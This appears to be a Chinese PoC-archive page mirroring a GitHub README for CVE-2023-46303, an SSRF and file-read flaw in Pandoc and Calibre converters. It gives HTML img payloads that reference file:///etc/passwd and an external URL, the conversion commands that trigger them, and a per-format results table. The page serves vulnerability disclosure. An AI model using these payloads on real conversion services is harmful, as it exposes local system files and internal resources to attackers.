目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2023-46303 PoC — Kovid Goyal Calibre 代码问题漏洞

来源
https://github.com/0x1717/ssrf-via-img
关联漏洞
标题:Kovid Goyal Calibre 代码问题漏洞 (CVE-2023-46303)
Description:Kovid Goyal Calibre是印度科维德·戈亚尔(Kovid Goyal)个人开发者的一个开源免费的全能电子书阅读管理与格式转换工具。 Kovid Goyal Calibre 6.19.0之前版本存在安全漏洞,该漏洞源于默认可以添加文档根目录之外的资源。
Description
CVE-2023-46303 - SSRF Vulnerability in PANDOC and CALIBRE
介绍
# :bee: CVE-2023-46303
## SSRF Vulnerability in PANDOC and CALIBRE
### UPDATE ->
#### https://nvd.nist.gov/vuln/detail/CVE-2023-46303
#### https://security.snyk.io/vuln/SNYK-DEBIAN13-CALIBRE-6027875
-
-
-
-
- 
## :mushroom: PANDOC

### :spider_web: https://github.com/jgm/pandoc (Pandoc in Github)
- What is Pandoc?
- Pandoc is a Universal Markup Converter

[![Star History Chart](https://api.star-history.com/svg?repos=jgm/pandoc)](https://star-history.com/#jgm/pandoc)
---
-
-
-
-
## :mushroom: CALIBRE

### :spider_web: https://github.com/kovidgoyal/calibre (Calibre in Github)
- What is Calibre?
- The official source code repository for the calibre ebook manager

[![Star History Chart](https://api.star-history.com/svg?repos=kovidgoyal/calibre&type=Date)](https://star-history.com/#kovidgoyal/calibre)
---
-
-
-
-

## For Example
+ ### We install both applications on a linux computer and create a test file with html

### :lady_beetle: ssrf.html
+ `<img src="file:///etc/passwd">`
+ `<img src="http://ip-api.com/csv">`
+ ![ssrf.html](img/0x1.png "ssrf.html")

## Where does the vulnerability occur and how is it triggered?
+ When we want to convert an html file to a different document via terminal, we use the following command.
+ `$ pandoc ssrf.html -o ssrf.epub` PANDOC
+ `$ ebook-convert ssrf.html ssrf.epub` CALIBRE

## SSRF via Converter (Example is PANDOC but you can also try CALIBRE)
+ `$ pandoc ssrf.html -o ssrf.epub` PANDOC
+ ![0x2.png](img/0x2.png "0x2.png")
+ ![0x3.png](img/0x3.png "0x3.png")
+ After the html file is successfully converted to epub file, you need to open this epub file with "Archive Manager"
+ When we check the folders and subfolders in the epub file we opened with "Archive Manager", we will see one or two different files. When we open these files, we can see that the ssrf vulnerability is triggered.
+ ![0x4.png](img/0x4.png "0x4.png")
+ ![0x5.png](img/0x5.png "0x5.png")
+ ![0x6.png](img/0x6.png "0x6.png")
+ ![0x7.png](img/0x7.png "0x7.png")
+ ![0x8.png](img/0x8.png "0x8.png")

---
-
-
-
-

+ I went through all converter processes in pandoc and calibre and found that this vulnerability exists in multiple converters.
+ In the table below, you can examine what types of ssrf are in which files.
+ You can also use the iframe tag instead of the img tag in calibre.

| PANDOC | EPUB | ODT | DOCX | PPTX | FB2 |
| --- | --- | --- | --- | --- | --- |
`<img src="file:///etc/passwd">` | :heavy_check_mark: | :heavy_check_mark: | :x: | :heavy_check_mark: | :x:
`<img src="http://ip-api.com/csv">` | :heavy_check_mark: | :heavy_check_mark: | :heavy_check_mark: | :x: | :heavy_check_mark: (Base64 Encoded)

| CALIBRE | EPUB |
| --- | --- |
`<img src="file:///etc/passwd">` | :heavy_check_mark: |
`<img src="http://ip-api.com/csv">` | :x: |

+ In the example, we converted our html file to epub, but as you can see in the table above, we can see that the vulnerability is triggered not only when converting to epub but also other files.
---
-
-
-
-

> #### Created by 0x1717 aka GYG3S
文件快照

 [4.0K]  /data/pocs/98c44cffc985d2d1739a7f0685e7b43ed8d14728
├── [4.0K]  img
│   ├── [ 13K]  0x1.png
│   ├── [ 23K]  0x2.png
│   ├── [5.3K]  0x3.png
│   ├── [ 18K]  0x4.png
│   ├── [ 30K]  0x5.png
│   ├── [ 17K]  0x6.png
│   ├── [187K]  0x7.png
│   └── [161K]  0x8.png
├── [1.0K]  LICENSE
├── [3.0K]  README.md
└── [4.0K]  src
    └── [  64]  ssrf.html

2 directories, 11 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。